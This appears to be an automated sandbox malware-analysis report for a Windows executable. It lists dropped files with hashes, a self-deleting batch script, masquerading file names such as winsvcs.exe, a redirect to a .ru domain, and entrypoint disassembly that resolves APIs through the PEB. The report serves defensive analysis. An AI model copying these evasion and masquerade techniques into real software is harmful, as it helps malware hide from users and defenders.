Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER178D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.460792149445656
Encrypted:	false
SSDEEP:	48:cvIwWl8zsJJg77aI9a1WpW8VYYYm8M4JURFm+q8wdtLgXXd:uIjfbI78E7VgJvHpgXXd
MD5:	586CCA759FE15A579FA449975C1335DD
SHA1:	6F97EF14D21296DAAA098E69AB7C4D41550B6FCF
SHA-256:	049472ECB62698FAB64B7137FF5342B40A3E61A37762B74067D6A82AB4D0DFCC
SHA-512:	4464EBC8C2EFB37BD7BAE9D8E66BFBD703F992A01CF06CC11B1202CB0444CC3A25C91D1FD6E5D900B94C970B0620ABE30114FA043BC1312A0316C5F446158E06
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426496" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k2[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tldr[1].htm

Download File

Process:	C:\Windows\94000696690303050\winsvcs.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.711744090932182
Encrypted:	false
SSDEEP:	3:uNXADyiJSONjAoHtTUXqyL3:uFA2icijAV6yL
MD5:	EABAE9BC3CF560F7331B31897C4F12C4
SHA1:	B8144E4BB843D4A63B6B1EC4D1A8E0745B7F7AFD
SHA-256:	ED5388A0D8F1A434F393A8125825158656668165AC751B475D8D207CB357262B
SHA-512:	8E2220FEA8D25CECC748B0DCEBF6A3294E467718338135447C1414B73F64BCC58C83E1D808358CC83727B69F8190A51D8202D502602883370FC1CA3C7917AF0A
Malicious:	false
Preview:	<a href="http://ww88.ssofhoseuegsgrfnu.ru/">Moved Permanently</a>...

C:\Users\user\AppData\Local\Temp\05c412c7.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.019257543655805
Encrypted:	false
SSDEEP:	3:jdKZON+E2J5xAIbnsMD2UN+E2J5xAIbnaKReJsjIdKZON+E2J5xAI8XGKEhovn:jdKoN723fgMD2UN723fe/dKoN723fLyn
MD5:	764F0F8C5915F754449D4F7DAC03B8BA
SHA1:	7E9EC3BB1E75EB1850D3A99C0F232D5EF4803373
SHA-256:	B9657435668B56EE72C37F00312B374ED5BD5A3C7BAD7381AD57370B2855601B
SHA-512:	F367913900A3C6126946051CDD72B1AD2F31416679EB14D793F11045F9CC161EC78838048908C0D97EA83A3522DC2A20D86752DC5F76DC28E40B9C20DED75EA8
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\XBVdJN.exe"..if exist "C:\Users\user\AppData\Local\Temp\XBVdJN.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\05c412c7.bat"..

C:\Users\user\AppData\Local\Temp\08FC68DE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\09704416.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\16CE69A8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\2AC27C85.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\55fb1e02.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	4.993340827293472
Encrypted:	false
SSDEEP:	6:jdKoN723fgMD2UN723fe/dKoN723fh19nn:jIMada2/IMa5fn
MD5:	383C01B3C3122770D7D993E21D4FACBC
SHA1:	A4B7CA52FB7CBB2037C824CE8DC4B453E25E03F4
SHA-256:	3D56D522897A6163485117E290CCB8A46502F691CDD6B26038BFA81830258B63
SHA-512:	A2A5A1329D86780366A7F658199DA6FF9EDE4CF26CCE100E75E9D75C6D2CE37D40050AFA9A81477553F0A56876C0E6A71DBF100421E36DDA0D5B63D43433D2D8
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\XBVdJN.exe"..if exist "C:\Users\user\AppData\Local\Temp\XBVdJN.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\55fb1e02.bat"..

C:\Users\user\AppData\Local\Temp\5DB90030.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\6E5F7BF1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\6F8E35CE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe

Download File

Process:	C:\Windows\94000696690303050\winsvcs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	479744
Entropy (8bit):	6.71960078405057
Encrypted:	false
SSDEEP:	12288:1TEbau3khjJxZcroZpy7XbEVaEb0mmYIwGde9PZGQm+k:1wuu3khjJxZcroZpyuAYIPde7G
MD5:	8DA4D99EBBA9A59FA372EEFD2556860C
SHA1:	658F27FF1CCC2B57EEAAF98AB469276EFE9C8C51
SHA-256:	5E174F9E0B7B914A4717ABC076AC00B3976E7A9A4ABCE6CA4170C8F267624C3C
SHA-512:	B8D4B406F8AEB611CB09E3961FA7C40128A9D5360B86DF149DAD115DE80951B2DF201D4963CE498CDA5E3D8768574415428C1087FC56FE632A281DBFCC8E7B96
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZcI.;...;...;....p..;...C...;...C...;...C...;....`..;....v..;...;...:...;...;...i...;...C...;..Rich.;..........................PE..L......\..........................................@.........................................................................P?...........)...................0..tD...................................................................................text...9d.......f.................. ..`.text1...............j.............. ..`.rdata..n............l..............@..@.data....v...`...F...6..............@....data1...............\|..............@....trace..t...........................@..@.rsrc....).......*..................@..@.reloc...T...0...V..................@..B.1...uD..P.......B.................. ...........................................................................................................................................

C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_290.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: LisectAVT_2403002B_293.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_296.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_301.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_309.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_303.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_302.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_307.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_308.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_315.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_324.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\94000696690303050\winsvcs.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_290.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	479744
Entropy (8bit):	6.71960078405057
Encrypted:	false
SSDEEP:	12288:1TEbau3khjJxZcroZpy7XbEVaEb0mmYIwGde9PZGQm+k:1wuu3khjJxZcroZpyuAYIPde7G
MD5:	8DA4D99EBBA9A59FA372EEFD2556860C
SHA1:	658F27FF1CCC2B57EEAAF98AB469276EFE9C8C51
SHA-256:	5E174F9E0B7B914A4717ABC076AC00B3976E7A9A4ABCE6CA4170C8F267624C3C
SHA-512:	B8D4B406F8AEB611CB09E3961FA7C40128A9D5360B86DF149DAD115DE80951B2DF201D4963CE498CDA5E3D8768574415428C1087FC56FE632A281DBFCC8E7B96
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZcI.;...;...;....p..;...C...;...C...;...C...;....`..;....v..;...;...:...;...;...i...;...C...;..Rich.;..........................PE..L......\..........................................@.........................................................................P?...........)...................0..tD...................................................................................text...9d.......f.................. ..`.text1...............j.............. ..`.rdata..n............l..............@..@.data....v...`...F...6..............@....data1...............\|..............@....trace..t...........................@..@.rsrc....).......*..................@..@.reloc...T...0...V..................@..B.1...uD..P.......B.................. ...........................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4689837004358575
Encrypted:	false
SSDEEP:	6144:YzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNsjDH5SC0:OZHtBZWOKnMM6bFpej4
MD5:	DECCE6BC91A5A8E5FD99234BDB9033B6
SHA1:	92C9FC065BC73E48881D3F8E22F6DBDE5327E1D4
SHA-256:	A164BEF62623689FAD31D2725171005006170B47E1938E5EC9CB6C26FD72CE26
SHA-512:	B97890E13504B3A0B7A117C33E5E55E47AFE2C04AAE66AD531DC9AF31224D42728191C6CD3E949C2173CC9725FDCAAF26FD4EBF36F36F0CDAF72868AF4742BC5
Malicious:	false
Preview:	regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..j.................................................................................................................................................................................................................................................................................................................................................g.^........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.71960078405057
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002B_290.exe
File size:	479'744 bytes
MD5:	8da4d99ebba9a59fa372eefd2556860c
SHA1:	658f27ff1ccc2b57eeaaf98ab469276efe9c8c51
SHA256:	5e174f9e0b7b914a4717abc076ac00b3976e7a9a4abce6ca4170c8f267624c3c
SHA512:	b8d4b406f8aeb611cb09e3961fa7c40128a9d5360b86df149dad115de80951b2df201d4963ce498cda5e3d8768574415428c1087fc56fe632a281dbfcc8e7b96
SSDEEP:	12288:1TEbau3khjJxZcroZpy7XbEVaEb0mmYIwGde9PZGQm+k:1wuu3khjJxZcroZpyuAYIPde7G
TLSH:	ECA48C0173D0D573E8D1087B0F77E793A63E2F807E64A997AF900A5DB92166198F630E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZcI.;...;...;....p..;...C...;...C...;...C...;....`..;....v..;...;...:...;...;...i...;...C...;..Rich.;.........................

File Icon


Icon Hash:	0f31498c88c96107

Static PE Info

General

Entrypoint:	0x479000
Entrypoint Section:	1uD
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5C01C09C [Fri Nov 30 22:58:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ecadb88ceebd0340f47ade94f24af148

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 64564258h
mov dword ptr [ebp-44h], 652E4E4Ah
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FF8F4B58AA5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFADB8Bh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FF8F4B58BEEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FF8F4B58AF4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FF8F4B58AEBh

Rich Headers

Programming Language:

[ASM] VS2005 build 50727
[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x43f50	0x118	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x2299c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x73000	0x4474	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x39000	0x4d4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x36439	0x36600	63673ef1b4151d7bc0cd02013f23be05	False	0.46641073994252874	Matlab v4 mat-file (little endian) \344\200VWS\270tw, numeric, rows 0, columns 0	6.497178211047947	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text1	0x38000	0x90	0x200	517045174f9f901ac4e4da530e56bd7b	False	0.26171875	data	2.0224887435167753	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x39000	0xc96e	0xca00	263190584a1bc5fb150d4a2460c8eff9	False	0.5509359529702971	data	6.243837129142952	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x46000	0x76e8	0x4600	4e70c9268238f7516c412f16458b05a9	False	0.25948660714285715	data	3.713935824019731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
